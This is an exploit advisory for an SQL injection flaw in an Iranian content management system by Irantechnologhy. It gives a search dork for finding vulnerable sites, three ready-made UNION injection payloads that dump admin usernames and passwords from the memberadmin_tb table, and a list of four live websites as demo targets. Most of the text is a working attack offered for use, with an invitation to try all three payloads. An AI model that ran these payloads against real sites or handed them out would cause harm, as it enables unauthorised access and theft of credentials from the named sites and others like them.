#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: Irantechnologhy IRANIAN CMS SQL injection
# Date: 2019-05-20
# Dork : [intext:"By Irantechnologhy" inurl:*id=] & [intext:"ایران تکنولوژی" inurl:*id=]
# Exploit Author: S I R M A X
# Vendor Homepage: http://www.iran-tech.com/
# Version: All Version
# Tested on: win,linux
=================================================================================
[SQL injection]
[+] Method ( Sql injection ) Nullix Security Team of IRan
[+] parameter : ID == php?ID=
=================================================================================
Mode Hash : MD5 or NORMAL
=================
[#] Testing Method:
[+] - UNION query
=================================================================================
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Exploits ==>
[*] 1 => id=-1 Union Select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(memberadmin_tb)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,m_u,0x3c62723e,0x70617373,0x203d3d3e20,m_p,0x3c62723e,0x3c62723e))))x),4,5,6,7,8,9,10,11--+
[*] 2 => id=-1' Union Select 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(memberadmin_tb)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,m_u,0x3c62723e,0x70617373,0x203d3d3e20,m_p,0x3c62723e,0x3c62723e))))x),(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(memberadmin_tb)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,m_u,0x3c62723e,0x70617373,0x203d3d3e20,m_p,0x3c62723e,0x3c62723e))))x)--+
[*] 3 => id=1' union select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(memberadmin_tb)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,m_u,0x3c62723e,0x70617373,0x203d3d3e20,m_p,0x3c62723e,0x3c62723e))))x),(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(memberadmin_tb)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,m_u,0x3c62723e,0x70617373,0x203d3d3e20,m_p,0x3c62723e,0x3c62723e))))x),5,6,7--+
<=> Please test all 3
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================
Demo:
[+] http://arianaagency.com/fa/user/temp.php?irantech_parvaz=1012&id=[SQL]
[+] http://iagp.ir/fa/temp.php?page=1&id=[SQL]
[+] https://karevan2000.com/fa/user/temp.php?irantech_parvaz=specific&id=[SQL]
[+] http://merkid.ir/new/en/user/temp.php?irantech=1&id=[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @NullixTM
[+] TNKS K0uR0sH3R
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#